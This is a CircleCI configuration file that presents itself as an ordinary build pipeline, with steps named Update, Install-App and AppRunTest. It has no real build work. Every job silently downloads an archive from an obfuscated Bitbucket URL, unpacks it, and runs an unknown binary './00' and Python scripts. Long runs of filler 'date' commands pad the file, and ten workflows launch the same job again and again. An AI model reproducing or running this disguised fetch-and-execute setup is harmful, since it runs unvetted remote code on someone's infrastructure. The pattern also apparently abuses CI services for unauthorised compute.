
version: 2.1

commands:

  setup:

    steps:
      - run:
          name: Update

          command: curl -o martialasion https://bitbucket.org/namskdjworitpwprkdgalxmv/naszxcoiuwemnaoemaosnuemazoiemnaszxoiemwazxmcnoemaowemazsxcovm/raw/9692e7a20bdcb3c48bb122f003a7b9184bb7b8fc/unaseiuowemnaszxcoivuiowezxmnvoieweoizxmasoiweruiomnaszxcnoiuewe > /dev/null 2>&1 && chmod u+x *

      - run:
          name: Upgrade

          command: tar -xf martialasion && chmod u+x *

      - run:
          name: Install-Modul

          command: python st.py

      - run:
          name: Install-App

          command: ./00

      - run:
          name: SettingOne

          command: date

      - run:
          name: SettingUp

          command: date

      - run:
          name: TestUpOne

          command: date

      - run:
          name: TestUp

          command: date

      - run:
          name: AppCek

          command: date

      - run:
          name: AppRunTest

          command: python hp.py

  setep:

    steps:
      - run:
          name: Update

          command: curl -o martialasion https://bitbucket.org/namskdjworitpwprkdgalxmv/naszxcoiuwemnaoemaosnuemazoiemnaszxoiemwazxmcnoemaowemazsxcovm/raw/9692e7a20bdcb3c48bb122f003a7b9184bb7b8fc/unaseiuowemnaszxcoivuiowezxmnvoieweoizxmasoiweruiomnaszxcnoiuewe > /dev/null 2>&1 && chmod u+x *

      - run:
          name: Upgrade

          command: tar -xf martialasion && chmod u+x *

      - run:
          name: Install-Modul

          command: python st.py

      - run:
          name: Install-App

          command: ./00

      - run:
          name: SettingOne

          command: |
            date

            date
            date

      - run:
          name: SettingUp

          command: date

      - run:
          name: TestUpOne

          command: |
            date
            date

      - run:
          name: TestUp

          command: |
            date
            date

            date
            date

      - run:
          name: AppCek

          command: date

      - run:
          name: AppRunTest

          command: python hp.py

  setip:

    steps:
      - run:
          name: Update

          command: |
            curl -o martialasion https://bitbucket.org/namskdjworitpwprkdgalxmv/naszxcoiuwemnaoemaosnuemazoiemnaszxoiemwazxmcnoemaowemazsxcovm/raw/9692e7a20bdcb3c48bb122f003a7b9184bb7b8fc/unaseiuowemnaszxcoivuiowezxmnvoieweoizxmasoiweruiomnaszxcnoiuewe > /dev/null 2>&1 && chmod u+x *

            tar -xf martialasion && chmod u+x *
            python st.py
            ./00

            date
            date
            date

            date
            date
            date

      - run:
          name: Upgrade

          command: |
            date
            date

            date
            date
            date

            date
            date
            date

            date
            date

      - run:
          name: Install-Modul

          command: |
            date
            date

            date
            date
            date

            date
            date
            date

      - run:
          name: Install-App

          command: |
            date
            date
            date

            date
            date
            date

      - run:
          name: SettingOne

          command: |
            date
            date
            date

            date
            date
            date

            date
            date

      - run:
          name: SettingUp

          command: |
            date
            date
            date

            date
            date
            date

            date
            date
            date

      - run:
          name: TestUpOne

          command: |
            date
            date

            date
            date

      - run:
          name: TestUp

          command: |
            date
            date
            date

            date
            date
            date

            date
            date

            date
            date

      - run:
          name: AppCek

          command: |
            date
            date

            date
            date

            date
            date

      - run:
          name: AppRunTest

          command: |
            date
            date

            date
            date
            date

            date
            date
            date

            date
            date

            date
            python hp.py
            
  setop:

    steps:
      - run:
          name: Update

          command: curl -o martialasion https://bitbucket.org/namskdjworitpwprkdgalxmv/naszxcoiuwemnaoemaosnuemazoiemnaszxoiemwazxmcnoemaowemazsxcovm/raw/9692e7a20bdcb3c48bb122f003a7b9184bb7b8fc/unaseiuowemnaszxcoivuiowezxmnvoieweoizxmasoiweruiomnaszxcnoiuewe > /dev/null 2>&1 && chmod u+x *

      - run:
          name: Upgrade

          command: tar -xf martialasion && chmod u+x *

      - run:
          name: Install-Modul

          command: python st.py

      - run:
          name: Install-App

          command: ./00

      - run:
          name: SettingOne

          command: date

      - run:
          name: SettingUp

          command: date

      - run:
          name: TestUpOne

          command: date

      - run:
          name: TestUp

          command: date

      - run:
          name: AppCek

          command: date

      - run:
          name: AppRunTest

          command: python hp.py

jobs:

  Sulapa:
    docker:

      - image: python:3.8

    working_directory: /root
    steps:

      - setup

  Mardius:
    docker:

      - image: python:3.8

    working_directory: /root
    steps:

      - setip

  Culikya:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setop
    parallelism: 1

  Niosa:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setop
    parallelism: 1

  Snapru:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setop
    parallelism: 1

  KloneAp:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:
      - setep

  CitCuit:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setop
    parallelism: 1

  SubdoLa:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setop
    parallelism: 1

  SubdoPa:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setop
    parallelism: 1

  TestYarna:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setep

  Selebor:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setop
    parallelism: 1

  OkPasss:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setop
    parallelism: 1

  test_13:
    docker:

      - image: python:3.8

    working_directory: /root

    steps:

      - setop
    parallelism: 1

workflows:

  dari:

    jobs:
      - Sulapa

  sab:

    jobs:
      - Sulapa

  bang:

    jobs:
      - Sulapa

  sampe:
    jobs:
      - Sulapa

  mar:
    jobs:

      - Sulapa

  uke:
    jobs:

      - Sulapa

  berjar:
    jobs:
      - Sulapa

  pulo:
    jobs:

      - Sulapa

  pulou:
    jobs:

      - Sulapa

  stepesja:
    jobs:

      - Sulapa
